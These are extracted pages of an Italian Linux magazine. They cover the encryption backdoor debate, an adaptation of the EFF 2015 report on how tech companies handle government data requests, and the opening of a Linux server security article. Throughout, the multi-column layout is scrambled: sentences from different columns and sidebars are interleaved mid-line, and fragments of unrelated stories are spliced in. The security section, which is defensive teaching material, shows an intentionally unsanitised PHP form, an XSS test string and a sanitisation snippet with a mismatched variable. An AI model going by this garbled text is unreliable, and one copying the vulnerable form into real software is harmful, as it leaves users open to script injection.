dei propri clienti a seguito di un’ordinanza del Tribunale.
Il documento formulato è abbastanza fumoso. Tuttavia fa Non perché siano in sintonia con i quattro cavalieri della cyber- https://apt.
securelist.
riferimento al potere da parte del Ministero degli Interni apocalisse (terroristi, pirati, spacciatori di droga e pedofili), ma
com è un sito
di richiedere la rimozione della protezione elettronica nelle perché sanno che qualsiasi tentativo in tal senso potrebbe
che contiene
comunicazioni tra cittadini. In sostanza si parla della essere sfruttato a fini illegali. Immaginate cosa potrebbe informazioni
crittografia end-to-end usata dalle singole persone per non far succedere se uno stato canaglia entrasse in possesso della dettagliate
sapere a nessuno ciò che è contenuto in un messaggio. La così chiave per cifrare le comunicazioni private di ognuno di noi. sulla diffusione
detta Strong Encryption (una branca della matematica La storia recente ha dimostrato come i segreti, compresi quelli dei malware
chiamata “crittografia a chiave pubblica”) ha rotto le uova governativi, hanno la pessima abitudine di divenire pubblici.
nel paniere su entrambi i lati dell’Atlantico. Molti politici, infatti, È vero, i criminali sfruttano anch’essi la Strong Encryption, ma
pur permettendo ai singoli cittadini di comunicare in privato, grazie agli errori che commettono possono essere presi nel
pretenderebbero che il governo avesse una chiave universale sacco dalle forze di polizia. Inoltre (passateci la nota polemica),
per scardinarne la privacy. Molte aziende informatiche i malviventi fanno anche e soprattutto uso massiccio di armi,
mondiali si sono dichiarate contrarie a questa proposta. ma nessuno ha ancora richiesto di metterle al bando.

di Charlie Miller e Chris Valasek. I due

esperti di sicurezza sono riusciti a fermare
a distanza una Jeep su strada,
controllandone i freni. Fortunatamente
nessuno è rimasto ferito, con la morale che
Fiat Chrysler ha dovuto correre ai ripari per
tappare la falla su ben 1,4 milioni di veicoli:
che figuraccia!

JuniperOS
Juniper fornisce firewall alle imprese
interessate. Nel mese di dicembre 2015
ha annunciato che del “codice non
autorizzato” era stato trovato nel loro
firmware. Si tratta però di una storia che fa
capo a due problemi. Il primo riferito alla
password di amministrazione che sembra
essere stato presente dalla fine del 2013.
Il secondo, invece, risale addirittura
al 2008. Questo nonostante l’azienda fosse
stata informata delle vulnerabilità e della
possibilità a prestare il fianco a possibili
backdoor. In sostanza, alla fine del 2012,
alcuni aggressori hanno modificato
il software, con la conseguenza di essere
riusciti a decifrare passivamente tutto
il traffico VPN. Hacking Team avrebbe venduto il proprio spyware a svariati governi canaglia

19
 Protezione Generale
Crediti

Autori:
Nate Cardozo,
Kurt Opsahl,
Rainey Reitman
Editor:
Parker Higgins, Dave Maass
Presentazione:
Parker Higgins
Pubblicazione della
Electronic Frontier
Foundation, 2015
Trovate l’originale su:
www.eff.org/who-has-your-
back-government-data-
requests-2015
Questo articolo
è derivato ed elaborato a
partire dal report Who Has
Your Back? 2015: Protecting
Your Data From Government
Requests di Electronic
Freedom Foundation
Usato su licenza:
CC BY 3.0.

chi proteGGE
i tuoi datI?
Electronic Frontier Foundation ha pubblicato il suo
quinto resoconto annuale sulla privacy e la trasparenza
online e spiega le implicazioni per tutti i nostri dati

L
e nostre vite sono piene di per riconoscere che le mail salvate per più ci rivolgiamo sempre di più alle aziende stesse
elementi digitali: dai video di sei mesi si meritano la stessa identica del settore tecnologico per ottenere le
condivisi sui social network alle protezione di quelle più recenti. Il Congresso procedure più serrate possibile per difendere
app sui cellulari che geolocalizzano sta anche temporeggiando nell’interrompere la i diritti degli utenti. Quali aziende, però,
le nostre posizioni, dai dati di login per sorveglianza indiscriminata dell’Agenzia per la staranno dalla parte degli utenti insistendo
connetterci alla posta elettronica Sicurezza Nazionale (NSA) sulle comunicazioni sulla trasparenza e rigidi standard legali per
ai documenti che abbiamo salvato online e il Paese attende delle riforme da tempo quanto riguarda l’accesso del governo ai dati
e, naturalmente, la cronologia del nostro indispensabili. Sia negli Stati Uniti sia nel Regno degli utenti? E quali renderanno pubbliche
browser. Informazioni personali, profonde Unito il governo sta anche considerando delle le loro politiche, permettendo al mondo
e persino assurde sono trascritte in proposte che renderebbero obbligatorio dare e ai loro utenti di giudicare come difendono
pacchetti di dati e viaggiano nelle arterie alle autorità delle backdoor alle tecnologie il nostro diritto alla privacy? Per quattro anni
di fibra ottica della Rete. su cui facciamo affidamento per comunicare noi membri dell’Electronic Frontier Foundation,
Se però le nostre vite si sono integrate nel 21° digitalmente, il che renderebbe la situazione organizzazione internazionale no profit per la
secolo, la legge non tiene il passo. ancora più difficile. In questo clima, difesa dei diritti digitali, abbiamo documentato
Persino negli Stati Uniti, le pratiche dei più grandi provider
considerati all’avanguardia della
tecnologia, a oggi, il Congresso
“Se le nostre vite si sono e aziende che operano su Internet,
giudicando le loro politiche pubbliche
non ha ancora aggiornato la
legislazione del 1986 “Electronic
integrate nel 21° secolo, e segnalando le migliori. Nel corso
dei primi quattro anni, abbiamo visto
Communications Privacy Act” la legge non tiene il passo” svilupparsi una trasformazione nelle

20

pratiche delle principali aziende nel settore
tecnologico. Straordinariamente, i giganti
della tecnologia hanno iniziato a pubblicare
resoconti annuali delle richieste di dati da parte
del governo, promettendo di avvisare gli utenti
quando le autorità richiedono accesso
ai loro dati, e di richiedere un mandato di
perquisizione prima di consegnare i contenuti
dell’utente. Le migliori pratiche identificate nei
primi resoconti di EFF sono diventati in pochi
anni gli standard del settore e siamo fieri del
ruolo che le nostre analisi annuali hanno svolto
nello spingere le aziende a istituire questi
cambiamenti. I tempi però sono cambiati e ora
gli utenti si aspettano di più. I criteri utilizzati
nel giudicare le aziende nel 2011 erano
ambiziose allora, ma sono state quasi
universalmente adottate negli anni a seguire.
Oggi gli utenti devono aspettarsi che le aziende
superino gli standard articolati nel primo
resoconto. Devono aspettarsi che aziende
come Google, Apple, Facebook e Amazon
siano trasparenti sul tipo di contenuto che
viene bloccato o censurato in risposta
a richieste governative, oltre a svelare quali
Il controllo delle informazioni
trasparenza e ai diritti degli utenti. Abbiamo
alzato gli standard per vedere quali sono le
aziende leader.
Criteri di valutazione
A questo scopo, abbiamo usato i cinque criteri
che seguono per valutare le pratiche e le
politiche delle aziende:
1 Buone prassi consolidate: una categoria
composita che valuta le aziende in base a
tre criteri a cui devono rispondere:
L’azienda richiede che il governo ottenga
un mandato da un giudice per consegnare il
contenuto delle comunicazioni di un utente?
L’azienda pubblica un transparency
report, cioè dati regolari e utili relativi
a quante volte i governi hanno richiesto
informazioni degli utenti all’azienda
e quante volte sono state fornite?
L’azienda pubblica delle linee guida per
le autorità spiegando come risponde alle
richieste di dati da parte di enti governativi?
2 Comunicare agli utenti le richieste
EFF ha alzato le aspettative nel 2015
legale. Abbiamo cambiato questo criterio
rispetto agli anni scorsi: quello che richiediamo
ora è che l’azienda avvisi gli utenti prima del
passaggio di dati tranne in casi in cui
sia proibito dalla legge e in situazioni di
emergenza e che l’azienda si impegni anche
a dare notifica al termine della situazione di
emergenza o del periodo di applicazione della
legge. Mentre stendevamo i criteri per il nuovo
report, l’anno scorso, abbiamo comunicato
alle aziende che avremmo introdotto questo
cambiamento in modo da dar loro un anno
intero per implementare procedure di notifica
post factum quando appropriate.

dati cancellati vengono conservati nel caso di dati da parte delle autorità: per ottenere 3 Rendere pubbliche le politiche di

al governo servisse accedervi in futuro.
Ci aspettiamo anche che queste aziende
prendano una posizione di principio contro
le backdoor obbligatorie per le autorità.
Nel quinto rapporto annuale Who Has Your
Back? abbiamo preso i principi fondamentali
delle versioni precedenti e le abbiamo riunite
in un’unica categoria: “Buone prassi
consolidate”. Abbiamo anche elevato le nostre
aspettative sulla notifica agli utenti e abbiamo
aggiunto nuove categorie per evidenziare
altre importanti tematiche relative alla
una stella in questa categoria le aziende
devono garantire di notificare agli utenti
quando il governo richiede i loro dati,
tranne in casi in cui sia proibito dalla legge,
in situazioni di emergenza molto specifiche e
definite o a meno che farlo non
sia futile e privo di efficacia. La notifica dà
agli utenti la possibilità di difendersi contro
richieste non giustificate di dati da parte
del governo. La pratica migliore è avvisare gli
utenti prima del passaggio di dati, in modo
che possano contrastare l’operazione a livello
archiviazione dei dati dell’azienda: questa
categoria premia le aziende che rendono
noto per quanto tempo conservano dati
sui loro utenti che non sono accessibili
agli utenti stessi (inclusi i log degli indirizzi
IP e i contenuti cancellati) in una forma
accessibile alle autorità giudiziarie.
Nel caso il periodo di conservazione dovesse
variare per motivi tecnici o di altra natura,
l’azienda deve renderlo noto e pubblicare una
media approssimativa o un intervallo tipico,
insieme a un limite massimo se disponibile.

Richieste di rimozione da parte delle autorità

Per più di un anno, il ricercatore
investigativo principale di EFF
Dave Maass ha studiato come
Facebook coopera con i sistemi
carcerari negli Stati Uniti per
bloccare l’accesso dei detenuti
al social network. Facebook ha
persino organizzato uno
specifico modulo “Richiesta di
eliminazione account detenuto”
per aiutare le guardie carcerarie
a segnalare la cancellazione
degli account di detenuti.
Questa pratica ha ispirato la più
recente delle categorie di EFF:
controllare con che frequenza
le aziende rimuovono contenuti
o cancellano account su richiesta
delle autorità governative.
Per avere un riscontro positivo in
questa categoria, le aziende non
hanno bisogno di rifiutare in
tutto o in parte le richieste di
rimozione dei contenuti da parte
delle autorità, ma essere
trasparenti sulla frequenza con
cui bloccano o rimuovono
contenuti o account. Sulle 24
aziende valutate nel nostro
report 15 hanno ricevuto una
stella in questa categoria,
anche se alcune non ospitano
contenuti. Un esempio
particolarmente brillante
di questa pratica sono i dati
pubblicati da Twitter, che
includono una mappa che
consente agli utenti di passare
con il mouse sui vari Paesi
e ottenere dati sulle richieste
di rimozione di contenuti Twitter offre una panoramica esaustiva di tutte le sue richieste di
su un periodo di sei mesi. eliminazione di contenuti e della frequenza con cui vengono accettate

21
 Protezione Generale
Abbiamo dato questa stella a tutte le aziende
che rendono note le loro pratiche, anche
quando queste pratiche sono fortemente
scoraggiate dall’EFF, per esempio se l’azienda
conserva i dati sugli utenti indefinitamente.
4 Rendere noto quante volte le autorità
richiedono la rimozione di contenuti
o account degli utenti e con che frequenza
l’azienda implementa queste richieste:
attualmente è una pratica standard del
settore avere transparency report.
Riteniamo che la responsabilità di trasparenza
delle aziende includa non solo svelare quando
le autorità richiedono i dati degli utenti,
ma anche la frequenza con cui chiedono
la rimozione di dati o la sospensione di
account e quante volte l’azienda dà seguito
alle loro richieste. Diamo una stella in questa
categoria alle aziende che pubblicano
regolarmente queste informazioni, nel loro
transparency report o in un’altra forma
similmente accessibile. Le aziende dovrebbero
includere i procedimenti legali formali oltre alle
richieste informali da parte delle autorità, dato
che la censura può prendere diverse vesti.
5 Politiche pubbliche a tutela degli utenti -
opporsi alle backdoor: ogni anno,
dedichiamo una categoria alla posizione
pubblica delle aziende su una certa situazione.
Per tre anni, abbiamo premiato le aziende
che lavoravano pubblicamente per aggiornare
e riformare la legislazione sulla privacy
elettronica. L’anno scorso abbiamo dato risalto
alle aziende che si opponevano pubblicamente
alla sorveglianza di massa. Quest’anno, dato
il rinvigorirsi del dibattito sulla crittazione,
abbiamo chiesto alle aziende di prendere una
posizione pubblica contro l’inclusione forzata
di debolezze nella sicurezza o altre forme
di backdoor obbligatorie. La posizione può
essere presa tramite un post in un blog, nel
transparency report, firmando pubblicamente
una lettera di protesta o attraverso un altro
mezzo pubblico, ufficiale e scritto.
Ci aspettiamo che questa categoria continui
a evolversi, per poter tener traccia della
posizione delle aziende su un’ampia gamma
di questioni legate alla privacy.
Il buono, il brutto e il cattivo
Siamo lieti di annunciare che nove aziende
hanno ottenuto stelle in tutte le categorie
disponibili (vedi tabella). Bisogna sottolineare
che alcune aziende ospitano quantità limitate
o irrilevanti di contenuto e di conseguenza la
trasparenza sulla richiesta di rimozione di dati
da parte delle autorità può non applicarsi.
Questi operatori mostrano che è fattibile
per le grandi aziende del settore tecnologico
adottare delle pratiche d’eccellenza per la
22
I risultati completi Comunica
L’azienda segue agli Rende note le Rende note le Politiche
utenti le
le buone prassi richieste politiche di richieste di di tutela utenti:
del report annuale di dati archiviazione dei rimozione di
consolidate delle autorità
dati dell’azienda contentuti
si oppone alle
backdoor
di EFF evidenziano
i risultati molto
modesti
del popolare servizio
di messaging
WhatsApp N/A
N/A
trasparenza e tutelare
i loro utenti quando le
autorità fanno le loro
richieste. Sfortunatamente,
non tutti stanno applicando
queste pratiche.
Due grandi operatori delle
telecomunicazioni, Verizon
e AT&T, hanno ottenuto
risultati particolarmente
modesti, perpetuando
una tendenza dei grandi
provider delle N/A
comunicazioni a non tenere
il passo con il resto del
settore tecnologico già
identificata nei precedenti
report. Ci sono però anche
fornitori di servizi Internet
N/A
(ISP) e provider di servizi
di telecomunicazioni che N/A
sono all’avanguardia
nell’adottare politiche
a tutela dell’utente.
In particolare, Credo
e Sonic hanno ricevuto
stelle in tutte le categorie.
Comcast è appena dietro, con 3 delle 4 stelle mentre pretendere un mandato assicura che
possibili. Speriamo che altri operatori delle ci siano i presupposti legali per la cessione dei
telecomunicazioni adottino questi standard dati. Nel 2011, nessuna azienda ha ricevuto
nei prossimi anni. è risultato anche chiaro che stelle in tutte le categorie. Quest’anno, 23 delle
le aziende del settore tecnologico sono unite 24 aziende valutate hanno adottato queste
contro le backdoor forzate dalle autorità. prassi. è chiaro che sono profondamente
Delle 24 aziende che abbiamo valutato 21 radicate nel settore, ma WhatsApp non
hanno fatto dichiarazioni pubbliche contro è al passo.
le backdoor, che minano la sicurezza
e mettono in pericolo la privacy degli utenti. Notifica agli utenti
ISP, fornitori di servizi cloud, provider Quest’anno non abbiamo chiesto alle aziende
di Webmail e social network sono di assicurare semplicemente di informare
assolutamente allineati nel rifiutare falle nella gli utenti delle richieste di dati da parte delle
sicurezza richieste dal governo. autorità, ma di avvisarli prima di passare
le informazioni. Nei casi in cui le aziende non
Buone prassi possono legalmente farlo, abbiamo chiesto
Questi standard sono stati sviluppati nei che dessero notifica agli utenti non appena
quattro anni di report EFF e comprendono tre consentito dalla legge o al termine
dei fattori principali: richiedere un mandato dell’emergenza che lo rendeva impossibile.
prima di trasferire i dati degli utenti, pubblicare Sapendo che avrebbe richiesto cambiamenti
transparency report regolari e pubblicare guide notevoli dal punto di vista tecnico e logistico,
per le autorità. Questi due ultimi elementi abbiamo dato alle aziende un preavviso di oltre
aiutano gli utenti a capire con quale frequenza un anno dell’inclusione di questo criterio.
e in quali circostanze le aziende rispondono Due operatori, Google e Twitter, che avevano
alle richieste di dati da parte delle autorità, precedentemente ottenuto credito nel nostro
 Il controllo delle informazioni

Liberi in Linux
Il report EFF è molto centrato
sugli Stati Uniti ma, dato che gran
parte del mondo sfrutta molti
di questi servizi basati negli USA,
è un’analisi valida anche
internazionalmente. Dato che
sono appassionati di Open
Source, i nostri lettori sono più
consapevoli delle implicazioni
della privacy e meglio attrezzati
per fronteggiare la situazione.
Possono per esempio sfruttare
OwnCloud, che diventa sempre
più efficiente con il passare
del tempo, per creare il proprio
sistema personale di
collaborazione e condivisione
di documenti basato sul cloud.
Questo significa che si possono a crescere, come la quantità dei dati che ci salviamo. Noi continueremo
mettere in atto delle strategie a esaminare per voi le migliori opzioni Open Source e l’emergere
personali per sfuggire alle regole di novità come www.onlyoffice.com.
delle grandi aziende, alle loro
normative e ai problemi di privacy.
Nella realtà dei fatti però non tutti
possono farlo ed è nell’interesse
di ognuno di noi che le aziende
che forniscono servizi online lo
facciano in modo da proteggere
gli utenti senza piegarsi
ciecamente a ogni richiesta delle
autorità. O quanto meno facciano
sapere al pubblico come vengono
salvati i loro dati e quando (se mai
dovesse succedere) vengono
condivisi con gli enti governativi. Creare i tuoi servizi cloud indipendenti usando OwnCloud,
I servizi cloud continuano è un modo per tutelare la tua privacy

report per aver avvisato gli utenti delle
richieste di dati da parte delle autorità,
quest’anno non hanno ricevuto stelle perché
non avevano in atto procedure per avvisare
gli utenti quando fosse tornato possibile per
legge o cessata l’emergenza. Delle 24 aziende
valutate, 15 soddisfacevano questo criterio
e ci fa piacere vedere che il settore si sta
muovendo in questo senso. Ci ha colpito
particolarmente, in positivo, la policy
di Dropbox, che afferma: “La politica di
Dropbox è di notificare gli utenti nel caso
le autorità richiedano i loro dati prima di
consegnarli, salvo proibizione a norma di legge.
L’avviso potrebbe essere inoltrato in ritardo nei
casi che includano minacce fisiche o di morte
oppure lo sfruttamento di minori”.
Conservazione dei dati
Quest’anno per la prima volta abbiamo
valutato le aziende anche per la trasparenza
su quali dati cancellati continuano a
conservare. Spesso gli utenti non si rendono
conto che i dati che cancellano da un provider
di posta elettronica o un social network
rimangono salvati e disponibili per le autorità
giudiziarie su richiesta. La trasparenza è il
primo passo per far comprendere agli utenti
cosa succede ai loro dati cancellati, quindi
valutiamo le aziende sotto questo aspetto.
Va specificato che non facciamo richieste
specifiche sul fatto che gli operatori cancellino
i dati dopo un determinato periodo di tempo.
In realtà, alcune aziende affermano
pubblicamente di conservare i dati cancellati
e log dei server indefinitamente, una pratica
che secondo noi è terribile per gli utenti.
D’altra parte, per questo report, chiediamo
solo agli operatori di essere chiari sul periodo
di archiviazione di dati che non risultano
facilmente visibili per l’utente (inclusi indirizzi
IP e dati DHCP) oltre che dei contenuti che gli
utenti hanno cancellato. Anche in questo caso,
15 aziende su 24 hanno risposto a questo
criterio. Siamo stati particolarmente colpiti
dalla chiarezza e dal dettaglio dei termini di
Comcast. L’azienda mantiene i dati sui dettagli
delle chiamate per il servizio telefonico Xfinity
Voice per due anni. Includono chiamate locali,
locali a pagamento e su lunga distanza. In casi
particolari, potrebbero essere disponibili anche
dati più vecchi ma è necessario impiegare più
tempo e risorse per reperirli. Per ottenere più
dettagli su questa esemplare descrizione
della politica di conservazione dei dati leggete
il Comcast Law Enforcement Handbook
all’indirizzo http://bit.ly/LXFitsthelaw.
Opporsi alle backdoor
Uno dei grandi trend che osserviamo nel
settore è il rifiuto delle debolezze nella
sicurezza richieste dal governo. 21 delle 24
aziende considerate hanno preso una
posizione pubblica contro l’uso delle backdoor.
Si tratta di uno schieramento chiaro di cui
le autorità dovrebbero tenere conto a livello
legislativo. Molte aziende hanno sottoscritto
una lettera organizzata dall’Open Technology
Institute contro le richieste di abbassare
intenzionalmente la sicurezza, che dichiara:
“Vi esortiamo a respingere qualsiasi proposta
di abbassare deliberatamente i livelli di
sicurezza dei nostri prodotti… che le si chiami
front door o back door, introdurre
intenzionalmente delle vulnerabilità in prodotti
sicuri a beneficio dell’uso da parte delle
autorità rende i prodotti in questione meno
sicuri anche contro attacchi di altra natura.
Tutti gli esperti di sicurezza informatica che si
sono espressi pubblicamente sull’argomento
sono d’accordo su questo punto, inclusi gli
esperti del governo degli USA”.
Le conclusioni di EFF
Siamo lieti di vedere che le principali aziende
del settore tecnologico competono sul piano
della tutela della privacy e dei diritti degli
utenti. Pratiche che incoraggiano la
trasparenza con gli utenti sulle richieste di dati
da parte delle autorità stanno diventando la
norma per le aziende che operano su Internet.
Anche se siamo in grado di giudicare solo una
piccola parte del settore tecnologico,
crediamo che la nostra analisi rappresenti un
più ampio spettro. Forse stimolate dai dibattiti
sulla sorveglianza governativa e in risposta
alla crescente attenzione pubblica a questi
aspetti, sempre più aziende stanno
volontariamente esprimendo il desiderio di
limitare le richieste di accesso ai dati da parte
delle autorità e di dare agli utenti i mezzi per
opporvicisi. Pensiamo che questo tipo di
trasparenza possa portare sia a una
discussione più ampia delle tematiche sia a
cambiamenti estesi su come e quando i
governi possano accedere ai dati degli utenti,
e favorire il miglioramento e l’estensione delle
leggi sulla privacy digitale. Ci rendiamo anche
conto del fatto che le aziende del settore
tecnologico sono nella posizione di conoscere
e contrastare le richieste troppo estese delle
autorità, quindi dobbiamo fare quanto in
nostro potere per incoraggiarli a rendere
pubbliche le loro conoscenze e a opporsi. Nel
consegnare i nostri dati a queste aziende,
abbiamo dato loro la grande responsabilità di
fare tutto il possibile per tutelare la nostra
privacy. Siamo felici di constatare che molte
delle aziende valutate hanno saputo
fronteggiare questa sfida.

23
 Protezione Generale

Sicurezza
Croce e delizia
Puntiamo i riflettori sui
malware Linux, mostrandovi
i pericoli che si corrono
e come mettersi al sicuro

M
olto spesso si sente dire e virus ha poco senso creare programmi Web, per esempio, può infettare un numero
che Linux è molto più sicuro maligni utili ad attaccare un numero enorme di macchine tramite una serie
di Windows... Intendiamoci, di macchine così esiguo. Molto meglio di tecniche più o meno avanzate. Il vettore
a livello generale concentrarsi sul restante 98% equipaggiato di attacco più utilizzato a tal scopo, tuttavia,
è sicuramente così, ma rimane il plug-in Adobe Flash.
questo non significa che
il Pinguino sia immune “Alcune applet possono Alcune applet, per esempio,
possono sfruttarne una serie di
da virus e malware di vario
genere. I pericoli esistono,
sfruttare i punti deboli di Flash punti deboli per eseguire codice
su una macchina remota. Il tutto
ma rispetto al sistema
Microsoft sono in misura
per eseguire codice malevolo” naturalmente all’insaputa
dell’utente. Certo, le colpe sono
nettamente inferiore. In definitiva, tutto con Windows e Mac. Le vittime possono quindi da imputarsi anche e soprattutto ad Adobe,
si riduce a un semplice gioco di numeri. essere infettate in molteplici modi: inviando ma ancora una volta è la diffusione che conta.
Qualsiasi analisi statistica vi confermerà che allegati ingannevoli alle email o visitando siti Ci sono così tante persone che usano Flash da
Linux occupa solo il 2% nel mercato mondiale Web compromessi. È invece molto raro che farne un ottimo bersaglio per svariati attacchi.
dei computer desktop. Tenendo quindi ben una vulnerabilità del sistema operativo venga Lo stesso vale per Adobe PDF Reader o i plug-
presente tale dato, per i creatori di malware sfruttata per eseguire codice malevolo. Un sito in Oracle Java.

24

In tal senso è però importante considerare
come i server Web che stanno alla base dei siti
infetti siano per la maggior parte delle volte
macchine Linux. Ecco quindi che il teorema
secondo cui il Pinguino è immune da virus
e malware viene meno. Tutto sta nell’interesse
del potenziale pirata nell’intraprendere
un’azione verso uno specifico computer.
I server Web a cui abbiamo accennato, per
esempio, possono essere considerati obiettivi
molto sensibili. Basta pensare al numero
di pagine Web che gestiscono, nonché ai vari
database ricchi di dati sensibili che
contengono. Sebbene non esista una ricetta
infallibile per evitare gli attacchi, ci sono senza
dubbio una serie di strategie per mitigare
i pericoli. Vediamo quindi quali sono.
Configurazione prima di tutto
Linux, come ogni altro sistema operativo, ha
punti forti e deboli. Le vulnerabilità relative
alla sicurezza, in genere, sono molto poche.
Ciò non toglie che possano essere ugualmente
sfruttate. Indipendentemente da questo,
tuttavia, uno dei principali sistemi per
prevenire potenziali attacchi consiste nel
configurare a dovere le attività di un server.
Una macchina che gestisce in modo non
opportuno il traffico, è senza dubbio una preda
molto facile. Gli errori più comuni che vengono
commessi da Admin non troppo esperti
consistono nel non configurare in modo
opportuno i permessi in scrittura dei file
sensibili. Non solo, ma anche lasciare un server
SQL accessibile al pubblico può essere una
disattenzione fatale. Per un potenziale
aggressore, infatti, basterà un pizzico di
fortuna unita a un bruteforcing SSH per
ottenere pieno accesso. I login con password,
per esempio, dovrebbero essere disabilitati per
tutti gli account più importanti. Sotto questo
aspetto è molto meglio utilizzare una chiave
pubblica di autenticazione. Allo stesso modo,
è fondamentale che un server sia in ascolto
solo in localhost e sfrutti regole del firewall
ben calibrate ed efficaci. Se poi avete bisogno
di accedere, basterà usare un tunneling SSH.
I log-in di root, inoltre, dovrebbero essere
Come aggiornare le vecchie distro
Ci sono parecchi server che montano
distribuzioni il cui supporto è ormai venuto
meno. Gli amministratori di queste
macchine, in primo luogo, dovrebbero
prendere in considerazione la possibilità di
cambiare distro. Se non lo si può fare, è però
fondamentale concentrarsi sul backport dei
fix più importanti. In generale, bisognerà
procedere eseguendo un rolling dei propri
pacchetti, incorporando le varie patch di
disattivati, lasciando il solo uso di sudo o su
agli utenti che hanno bisogno di eseguire
attività amministrative estemporanee. Sempre
sul fronte della sicurezza è poi importante
considerare le ripercussioni che un eventuale
codice esterno può avere sul vostro sistema.
Gli script PHP, per esempio, forniscono un
vettore comune utilizzato sempre più spesso
per gli attacchi ai server Web. In generale,
comunque, qualsiasi linguaggio lato server
può essere usato in tal senso. Infatti, come
regola generale, tenete presente che
qualsiasi circostanza dove l’applicazione
Web accetta un input dall’utente è da
considerarsi pericolosa. Dal momento che
non si ha il pieno controllo su ciò che un
utente può inviare, è importante fare in
modo che qualsiasi elemento inoltrato venga
disinfettato a dovere. Per fare un esempio,
vi proponiamo un semplice modulo di ricerca
PHP come quello che segue:
<form method=’get’ action=’search.php’>
<input name=”search” value=”<?php echo $_
GET[‘search’];?>” />
<input type=submit name=’dosearch’
value=’Search’ /></form>
In questo caso, l’input è passato allo script
search.php senza essere stato
preventivamente controllato. L’utente,
pertanto, potrebbe aver iniettato qualche
sicurezza. I pacchetti sorgente per le vecchie
distro sono abbastanza facili da trovare.
Per Ubuntu, per esempio, diamo un’occhiata
a https://launchpad.net, mentre per
Debian a http://archive.debian.org.
Per l’occasione è una buona idea creare una
macchina virtuale il più simile possibile al
computer reale di cui vi servite. Avrete anche
bisogno di un toolchain gcc e di gestire
a dovere tutte le dipendenze necessarie
Malware Linux
Munin deriva dal
termine norreno che
significa “memoria”.
La sua funzione
è quella di rendere
molto più pratica
e intuitiva
la consultazione
dei dati relativi
all’uso della CPU
e dei servizi
di sistema
Javascript utile a cercare la stringa:
“><script>alert(0)</script>
I risultati compaiono quindi in una finestra di
avviso. I quote iniziali interrompono l’attributo
HTML value, mentre la parentesi destra
funziona da elemento di input. Per difendersi
da questi imbrogli, è fondamentale assicurarsi
che tutti gli strumenti utili a filtrare gli input
siano attivi. Adesso prendiamo in
considerazione questo codice:
<?php
$input = “pointy brackets <and> &
ampersands?”;
var_dump(filter_var($url,FILTER_SANITIZE_
SPECIAL_CHARS));
?>
In tal caso, l’output del browser sarà il
medesimo, ma se si guarda alla sorgente
HTML generata dallo script, noterete come
in realtà la stringa sia la seguente:
“pointy brackets &lt;and&gt; &amp
ampersands?”
In alternativa, qui è possibile usare anche
FILTER_SANITIZE_STRING il cui ruolo
consiste nel rimuovere i tag. Quando si utilizza
PHP per interfacciarsi con un database,
anziché usare MySQLi, vale sempre la pena
sfruttare l’API PDO (PHP Data Objects). In tal
modo, i dati non verranno mai scambiati per
istruzioni. Tornando per un attimo all’analisi
al pacchetto. Non sarà facile, soprattutto
perché le patch di sicurezza dovranno
adattarsi a versioni più vecchie del sistema
e quindi non saranno immuni da possibili
errori. Se state usando una distro basata
su Debian, aggiungete le patch in debian/
patches/all directory, quindi inserite
il nome del fix nel file debian/patches/
series. Infine, eseguite il debuild per creare
il pacchetto.
25
 Protezione Generale
delle vulnerabilità, è importante ricordare che, sospensione dei servizi erogati dalla vostra
una volta scoperte, vengono riepilogate nel macchina, tenete ben presente che la
sistema CVE o Common Vulnerabilities and sicurezza è il primo e il più importante
Esposures. Nel caso in cui le informazioni elemento da considerare quando si gestisce
inerenti una nuova falla siano bloccate, un server. Causare cinque minuti di inattività
magari perché non ancora pronte per la per aggiornare il sistema è una prospettiva
pubblicazione, un identificatore CVE può nettamente migliore rispetto a vedersi rubare
essere un buon sistema per blindare il tutto. i dati archiviati in un database.
Infatti, niente vieta di mantenerlo riservato Scorrendo il bollettino Cyber Risk di HP
fino a quando non si decide il contrario. pubblicato all’inizio di quest’anno, si scopre
La maggior parte delle distro gestisce in piena che il 44% degli attacchi è stato causato
libertà i propri avvisi di sicurezza. Per capire sfruttando vulnerabilità vecchie di due o tre
di cosa stiamo parlando, date un’occhiata anni, per cui erano già disponibili da tempo
a https://security.gentoo.org. le rispettive patch. Questo significa che gli
A tal proposito, il sistema CVE può essere amministratori di sistema non sono stati
considerato un valido strumento di scambio abbastanza efficienti da porre rimedio quando
per una rapida diffusione delle informazioni dovevano. Una statistica ancora peggiore
relative a vecchi o nuovi problemi. Da qui, poi, è quella riportata dal Data Breach
inizia il percorso per la creazione delle patch. Investigations di Verizon. Qui possiamo
La mancata applicazione di questi pacchetti leggere come il 97% delle multinazionali più
che vanno a tappare le eventuali falle presenti conosciute al mondo sia stata oggetto di
nel sistema è quanto di più pericoloso ci possa un attacco che ha avuto come obiettivo 10
essere. Gli strumenti a disposizione di un vulnerabilità note, otto delle quali conosciute
potenziale aggressore per scansionare da almeno 10 anni. Applicare gli aggiornamenti
le vulnerabilità di un sistema sono davvero e le patch è quindi fondamentale, ma ci sono
molti e tutti consentono di avere una mappa anche casi in cui non è possibile farlo per
ben precisa di dove attaccare. Ecco perché cause di forza maggiore. I sistemi embedded,
è fondamentale tenere il proprio sistema per esempio, non dispongono di un gestore
sempre ben aggiornato. Nonostante questo pacchetti. Inoltre, funzionando spesso
possa comportare qualche momentanea su architetture non-x86, rendono la creazione
dei binari un vero strazio.
Nel box in questa pagina Open
vs Closed vi forniamo qualche
dritta su come procedere
quando non potete aggiornare
i pacchetti tramite i canali
standard. Tuttavia, si tratta
pur sempre di una minoranza.
In linea generale, quindi, tenete
a mente l’importanza di
mantenere il vostro sistema
sempre in forma. Debian Jessie,
per esempio, è stato rilasciato
il 6 giugno ed è disponibile
per tutte le architetture.
Metasploit Framework è fantastico: la documentazione è A tal proposito, tenetelo ben
facile da capire e fondamentale per usarlo correttamente presente se volete sfruttare un
solido sistema operativo con un supporto
a lungo termine.
Malware a catena
Le vulnerabilità sono spesso concatenate.
Per esempio, alcuni file PHP di dubbia natura
potrebbero consentire a un aggressore di
caricare i propri script sul server. Se il vostro
Apache soffre di alcuni problemi potrebbe poi
consentire a questi script di agire indisturbati,
magari sfruttando una serie di bug a scalata
sui privilegi fino ad arrivare al root. A questo
punto, la macchina è virtualmente sotto
il controllo dell’attaccante e tutti i dati in essa
contenuti devono essere considerati
compromessi. Naturalmente, l’attacco
sarebbe da considerarsi riuscito se tutto
questo avviene a vostra insaputa. Magari
pensate che vada tutto bene, ma sulla vostra
homepage compare un piccolo applet Flash
che inocula malware agli utenti che si
collegano al sito. A tal proposito è quindi
fondamentale abituarsi a controllare
a intervalli regolari i log del server. Seppure
nella maggior parte dei casi tali file tendano
a occupare parecchio spazio, ci sono sistemi
utili a ridurne le dimensioni. Logwatch, per
esempio, è uno strumento particolarmente
utile e che può riassumere gli accessi a SSH,
